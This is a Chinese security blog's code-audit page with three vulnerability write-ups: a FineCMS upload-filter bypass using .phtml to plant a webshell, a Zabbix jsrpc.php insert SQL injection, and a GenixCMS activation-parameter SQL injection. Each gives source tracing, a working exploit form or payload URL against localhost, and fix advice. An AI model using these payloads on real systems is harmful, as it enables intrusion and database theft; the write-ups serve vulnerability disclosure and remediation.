王松_Striker

安全盒子创始人,专注于Web安全研究。

分类 代码审计 下的文章

作者:@王松_Striker   时间:September 30, 2016

FineCMS前台getshell

FineCMS企业网站管理系统(简称免费版或企业版)是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统,面向多终端包括Pc端网页和移动端网页,支持自定义内容模型和会员模型,并且可以自定义字段,可面向中小型站点提供重量级网站建设解决方案,适用于小型站点、企业级网站、新闻内容网站等。

##漏洞概要

finecms某处过滤不严格,导致可上传任意脚本文件。

漏洞详情

依旧是AttachmentController,当然这次不再是kindeditor_upload的上传文件然后包含文件这么简单了,而是直接上传脚本执行。

这次出现问题的是ajaxswfuploadAction方法,这个方法代码不是很多,我就直接全部贴出来了:

/**
* Swf上传
*/
public function ajaxswfuploadAction() {
   if ($this->post('submit')) {
       $_type = explode(',', $this->post('type'));
       if (empty($_type)) {
           exit('0,' . lang('att-6'));
       }
       $size = (int)$this->post('size');
       if (empty($size)) {
           exit('0,' . lang('att-5'));
       }
       $data = $this->upload('Filedata', $_type, $size, null, null, $this->post('admin'), 'swf', null, $this->post('document'));
       if ($data['result']) {
           exit('0,' . $data['result']);
       }
       //唯一ID,文件全路径,扩展名,文件名称
       exit(time() . rand(0, 999) . ',' . $data['path'] . ',' . $data['ext'] . ',' . str_replace('|', '_', $data['file']));
   } else {
       exit('0,' . lang('att-4'));
   }
}

聪明的人,一眼就能看出来,从post请求中获取了type
那么这个type是干啥用的?没错,他是设定允许上传的文件类型的,并且在第289行左右直接带入了upload函数!!!我的天哪!!

本以为这样就可以直接上传php文件进行getshell了,但是发现其实finecms也不傻~~在upload函数中进行了强制性的黑名单过滤:

$ext = $upload->fileext();
if (stripos($ext, 'php') !== FALSE
    || stripos($ext, 'asp') !== FALSE
    || stripos($ext, 'aspx') !== FALSE
    ) {
    return array('result' => '文件格式被系统禁止');

首先是获取了文件后缀,用了fileext()函数,跟进来看看:

/**
* 取得文件扩展
*
* @return 扩展名
*/
public function fileext() {
    return strtolower(trim(substr(strrchr($this->file_name['name'], '.'), 1, 10)));
}

先取出.和后面的所有字符,然后从.往后取出10个字符,最终全部转成小写。

然后我们继续看这个看似很牛逼的黑名单:

if (stripos($ext, 'php') !== FALSE
    || stripos($ext, 'asp') !== FALSE
    || stripos($ext, 'aspx') !== FALSE
    ) {
    return array('result' => '文件格式被系统禁止');

stripos函数从前往后查找phpaspaspx如果查到了就直接return了。

那好…… 我们利用phtml来进行绕过,不知道phtml是啥请自行百度。。。

先构造上传的html表单:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Finecms ajaxswfupload exp</title>
</head>
<body>
    <form action="http://finecms.localhost/index.php?c=attachment&a=ajaxswfupload" method="POST" enctype="multipart/form-data">
        <input type="file" name="Filedata">
        <input type="hidden" name="type" value="phtml">
        <input type="hidden" name="size" value="100">
        <input type="submit" name="submit" value="上传文件">
    </form>
</body>
</html>

然后上传一个带有一句话木马的phtml文件,答案是可行的:

14751635176891.jpg

访问上传的文件看看:

14751635559921.jpg

那么我们再用工具连接下这个一句话木马看看:

14751636024237.jpg

至此,一个前台getshell,bingo!

漏洞修复

文件/controllers/AttachmentController.php第224行的判断添加phtml限制:

if (stripos($ext, 'php') !== FALSE
    || stripos($ext, 'phtml') !== FALSE
    || stripos($ext, 'asp') !== FALSE
    || stripos($ext, 'aspx') !== FALSE
    ) {
    return array('result' => '文件格式被系统禁止');
}

另外不是很推荐用黑名单,用白名单会比黑名单有效得多。(其实这个修复方式还是可以绕过的)

作者:@王松_Striker   时间:August 22, 2016

Zabbix SQL注入漏洞分析

zabbix sql注入漏洞爆出来已有好几天了,最近忙于安全盒子用户中心的设计,一直没有去研究这个注入,今天早起,闲暇时间写下该文。

zabbix简介

zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。

影响版本

2.0.x
3.0.x

我这里的分析的版本是3.0.3,据说3.0.4已修复该漏洞。

漏洞分析

jsrpc.php中从url中获取了type,并且把$_REQUEST赋值给了$data,相关代码(第24行开始):

$requestType = getRequest('type', PAGE_TYPE_JSON);
if ($requestType == PAGE_TYPE_JSON) {
    $http_request = new CHttpRequest();
    $json = new CJson();
    $data = $json->decode($http_request->body(), true);
}
else {
    $data = $_REQUEST;
}

随后40行有一些条件,不满足就会exit,但是很好绕过,代码如下:

if (!is_array($data) || !isset($data['method'])
        || ($requestType == PAGE_TYPE_JSON && (!isset($data['params']) || !is_array($data['params'])))) {
    fatal_error('Wrong RPC call to JS RPC!');
}

再往下是一个传入$data['method']的switch语句,部分代码如下(第46行开始):

switch ($data['method']) {
    case 'host.get':
        $result = API::Host()->get([
            'startSearch' => true,
            'search' => $data['params']['search'],
            'output' => ['hostid', 'host', 'name'],
            'sortfield' => 'name',
            'limit' => 15
        ]);
        break;

    case 'message.mute':
        $msgsettings = getMessageSettings();
        $msgsettings['sounds.mute'] = 1;
        updateMessageSettings($msgsettings);
        break;

    case 'message.unmute':
        $msgsettings = getMessageSettings();
        $msgsettings['sounds.mute'] = 0;
        updateMessageSettings($msgsettings);
        break;

    case 'message.settings':
        $result = getMessageSettings();
        break;

第181行传入CScreenBuilder::getScreen($data);,代码如下:

case 'screen.get':
    $result = '';
    $screenBase = CScreenBuilder::getScreen($data);
    if ($screenBase !== null) {
        $screen = $screenBase->get();

        if ($data['mode'] == SCREEN_MODE_JS) {
            $result = $screen;
        }
        else {
            if (is_object($screen)) {
                $result = $screen->toString();
            }
        }
    }
    break;

跟进查看,发现CScreenBuilder的构造函数从url中接收了profileIdx2赋值给$this->profileIdx2并且带入CScreenBase::calculateTime执行,代码如下:

// calculate time
$this->profileIdx = !empty($options['profileIdx']) ? $options['profileIdx'] : '';
$this->profileIdx2 = !empty($options['profileIdx2']) ? $options['profileIdx2'] : null;
$this->updateProfile = isset($options['updateProfile']) ? $options['updateProfile'] : true;

$this->timeline = CScreenBase::calculateTime([
    'profileIdx' => $this->profileIdx,
    'profileIdx2' => $this->profileIdx2,
    'updateProfile' => $this->updateProfile,
    'period' => !empty($options['period']) ? $options['period'] : null,
    'stime' => !empty($options['stime']) ? $options['stime'] : null
]);

跟进calculateTime函数,461行对CProfile进行了更新,但是并没有进行SQL查询:

if ($options['updateProfile'] && !empty($options['profileIdx'])) {
    CProfile::update($options['profileIdx'].'.period', $options['period'], PROFILE_TYPE_INT, $options['profileIdx2']);
}

然而最终造成SQL注入的是最后一行:

require_once dirname(__FILE__).'/include/page_footer.php';

这个文件里第38行对CProfile进行了更新,代码如下:

if (CProfile::isModified()) {
    DBstart();
    $result = CProfile::flush();
    DBend($result);
}

跟进CProfile::flush(),把数据进行了遍历然后带入self::insertDB()

public static function flush() {
    $result = false;

    if (self::$profiles !== null && self::$userDetails['userid'] > 0 && self::isModified()) {
        $result = true;

        foreach (self::$insert as $idx => $profile) {
            foreach ($profile as $idx2 => $data) {
                $result &= self::insertDB($idx, $data['value'], $data['type'], $idx2);
            }
        }

        ksort(self::$update);
        foreach (self::$update as $idx => $profile) {
            ksort($profile);
            foreach ($profile as $idx2 => $data) {
                $result &= self::updateDB($idx, $data['value'], $data['type'], $idx2);
            }
        }
    }

    return $result;
}

跟进self::insertDB()即可看到$idx2没有过滤带入SQL查询:

private static function insertDB($idx, $value, $type, $idx2) {
    $value_type = self::getFieldByType($type);

    $values = [
        'profileid' => get_dbid('profiles', 'profileid'),
        'userid' => self::$userDetails['userid'],
        'idx' => zbx_dbstr($idx),
        $value_type => zbx_dbstr($value),
        'type' => $type,
        'idx2' => $idx2
    ];

    return DBexecute('INSERT INTO profiles ('.implode(', ', array_keys($values)).') VALUES ('.implode(', ', $values).')');
}

最后的DBexecute()里面也只是调用了mysqli_query执行sql而已。

至此,SQL注入形成。

然后构造语句,满足各种条件,让程序按照逻辑进入该出,即可注入:

http://localhost:8080/jsrpc.php?sid=111&type=3&method=screen.get&timestamp=111&mode=111&screenid=&groupid=&hostid=0&pageFile=111&profileIdx=web.item.graph&profileIdx2=1%20xor(select%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1))&updateProfile=true&screenitemid=&period=1&stime=1&resourcetype=17&itemids=1&action=1&filter=&filter_task=&mark_color=1

注入效果如图:

1.png

这里是insert注入,而且没有单引号,直接使用xor()在里面用任意报错注入语句即可注入。

修复建议

  • 升级版本至3.0.4
  • 使用intval函数过滤insertDB中的$idx2
作者:@王松_Striker   时间:March 23, 2016

GenixCMS某处SQL注入漏洞

GenixCMS介绍

GenixCMS一款简单和轻量级的移动商务内容管理系统,官网:http://genixcms.org/

漏洞原理

程序根目录下的register.php中,第116行到118行:

if (isset($_GET['activation'])) {
    # code...
    $usr = Db::result(sprintf("SELECT * FROM `user` WHERE `activation` = '%s' LIMIT 1", $_GET['activation'] ));

可以看到直接从网址获取activation并且没有经过任何过滤,直接带入了sql语句查询,故存在sql注入漏洞。

漏洞证明

注入payload如下:

http://genixcms.localhost/register.php?activation=1%27%20and%201=(updatexml(1,concat(0x23,(select%20user()),0x23),1))%23

2016-03-23 00-19-15屏幕截图.png

截止发稿前,官网同样存在该漏洞:

2016-03-23 00-26-18屏幕截图.png

TangScan插件

将在官方修复后发布。